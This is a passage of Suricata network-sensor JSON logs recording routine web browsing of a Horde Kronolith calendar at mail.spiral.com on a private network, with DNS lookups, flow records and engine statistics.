{"timestamp":"2020-02-29T00:22:32.764123+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:22:32.786769+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.888088+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62035,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:33.000123+0000","event_type":"stats","stats":{"uptime":15005,"capture":{"kernel_packets":139386,"kernel_drops":0},"decoder":{"pkts":139404,"bytes":95696369,"invalid":194,"ipv4":137843,"ipv6":10,"ethernet":139404,"raw":0,"null":0,"sll":0,"tcp":132311,"udp":5323,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2867,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2883,"synack":2874,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1886,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2435,"failed_udp":116},"tx":{"http":4842,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2517}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":215062,"memcap":0}}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":5}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":6}} {"timestamp":"2020-02-29T00:22:34.000162+0000","flow_id":202995961277195,"event_type":"flow","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":17,"bytes_toserver":2308,"bytes_toclient":12401,"start":"2020-02-29T00:19:53.109323+0000","end":"2020-02-29T00:21:32.815837+0000","age":99,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:37.471121+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52962,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472111+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52966,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472155+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":1}} {"timestamp":"2020-02-29T00:22:37.766816+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":14}} {"timestamp":"2020-02-29T00:22:38.036551+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":5}} {"timestamp":"2020-02-29T00:22:38.041842+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":2986,"tx_id":6}} {"timestamp":"2020-02-29T00:22:40.000200+0000","event_type":"stats","stats":{"uptime":15012,"capture":{"kernel_packets":139739,"kernel_drops":0},"decoder":{"pkts":139744,"bytes":95945702,"invalid":194,"ipv4":138181,"ipv6":10,"ethernet":139744,"raw":0,"null":0,"sll":0,"tcp":132642,"udp":5330,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2872,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2888,"synack":2879,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1891,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2438,"failed_udp":116},"tx":{"http":4872,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2520}},"flow_mgr":{"closed_pruned":2837,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:41.398092+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54228,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24532,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:22:43.003183+0000","flow_id":2063545735567906,"event_type":"flow","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1970,"bytes_toclient":12607,"start":"2020-02-29T00:21:31.907810+0000","end":"2020-02-29T00:21:42.154980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:46.541552+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52968,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} {"timestamp":"2020-02-29T00:22:48.000175+0000","event_type":"stats","stats":{"uptime":15020,"capture":{"kernel_packets":139767,"kernel_drops":0},"decoder":{"pkts":139773,"bytes":95948805,"invalid":194,"ipv4":138208,"ipv6":10,"ethernet":139773,"raw":0,"null":0,"sll":0,"tcp":132667,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2838,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:50.000294+0000","flow_id":436341541717765,"event_type":"flow","src_ip":"192.168.10.130","src_port":34228,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":66,"pkts_toclient":85,"bytes_toserver":8194,"bytes_toclient":105657,"start":"2020-02-29T00:21:44.345861+0000","end":"2020-02-29T00:21:49.809612+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:55.000161+0000","event_type":"stats","stats":{"uptime":15027,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2839,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":5,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:58.001576+0000","flow_id":2139845830940751,"event_type":"flow","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":2278,"bytes_toclient":6262,"start":"2020-02-29T00:21:52.170063+0000","end":"2020-02-29T00:21:57.196929+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:58.001929+0000","flow_id":1200270195341367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1676,"bytes_toclient":4695,"start":"2020-02-29T00:21:52.178231+0000","end":"2020-02-29T00:21:57.194742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:59.000384+0000","flow_id":2155793044521586,"event_type":"flow","src_ip":"192.168.10.81","src_port":52954,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:21:52.180850+0000","end":"2020-02-29T00:21:58.127221+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:00.000403+0000","flow_id":744964991983055,"event_type":"flow","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:59.499151+0000","end":"2020-02-29T00:17:59.609546+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:02.003132+0000","event_type":"stats","stats":{"uptime":15034,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2842,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":1,"flows_timeout":6,"flows_timeout_inuse":5,"flows_removed":1,"rows_checked":65536,"rows_skipped":65527,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18522,"memcap":0}}} {"timestamp":"2020-02-29T00:23:02.069259+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37424,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45637,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:03.000165+0000","flow_id":2218856049239313,"event_type":"flow","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":4261,"bytes_toclient":25370,"start":"2020-02-29T00:21:51.877841+0000","end":"2020-02-29T00:22:01.788265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 